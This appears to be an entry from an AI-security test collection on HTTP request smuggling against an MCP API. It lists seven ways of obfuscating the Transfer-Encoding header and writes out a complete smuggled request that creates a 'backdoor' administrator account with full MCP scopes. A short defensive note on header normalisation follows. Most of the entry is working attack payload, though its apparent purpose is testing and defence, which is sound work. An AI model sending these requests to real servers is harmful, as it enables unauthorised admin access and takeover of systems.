# DojoLM AI Security - Double Chunked Encoding

**Category:** WebMCP Chunked Encoding Bypass
**Severity:** CRITICAL

---

An attack using obfuscated Transfer-Encoding headers to create disagreement between proxy layers about chunked encoding:

Request with obfuscated Transfer-Encoding:
POST /api/tools/list HTTP/1.1
Host: mcp-api.example.com
Content-Type: application/json
Content-Length: 180
Transfer-Encoding: chunked
Transfer-encoding: identity

Various Transfer-Encoding obfuscation techniques:

1. Duplicate header with different values:
Transfer-Encoding: chunked
Transfer-Encoding: identity

2. Whitespace variations:
Transfer-Encoding : chunked
Transfer-Encoding:chunked
Transfer-Encoding:  chunked

3. Case variations:
Transfer-encoding: chunked
TRANSFER-ENCODING: chunked
Transfer-Encoding: Chunked

4. Line folding (obsolete but still parsed):
Transfer-Encoding: chunked
 , identity

5. Tab character:
Transfer-Encoding:\tchunked

6. Trailing garbage:
Transfer-Encoding: chunked0
Transfer-Encoding: chunkedchunked
Transfer-Encoding: chunked;ext=val

7. Newline injection:
Transfer-Encoding: chunked\r\nX-Fake: header

Smuggled payload using technique #1:
POST /api/tools/list HTTP/1.1
Host: mcp-api.example.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-encoding: identity

0

POST /api/admin/create-user HTTP/1.1
Content-Type: application/json
Content-Length: 80

{"username":"backdoor","password":"evil123","role":"admin","mcp_scopes":"all"}

Proxy A sees: Transfer-Encoding: chunked (first header wins)
Proxy B sees: Transfer-encoding: identity (last header wins, or ignores malformed)
Result: Request smuggling between the two interpretations

INSTRUCTION: This uses Transfer-Encoding header obfuscation for request smuggling. Servers must normalize and deduplicate Transfer-Encoding headers, reject requests with multiple conflicting values, and use strict HTTP parsing that rejects malformed headers.
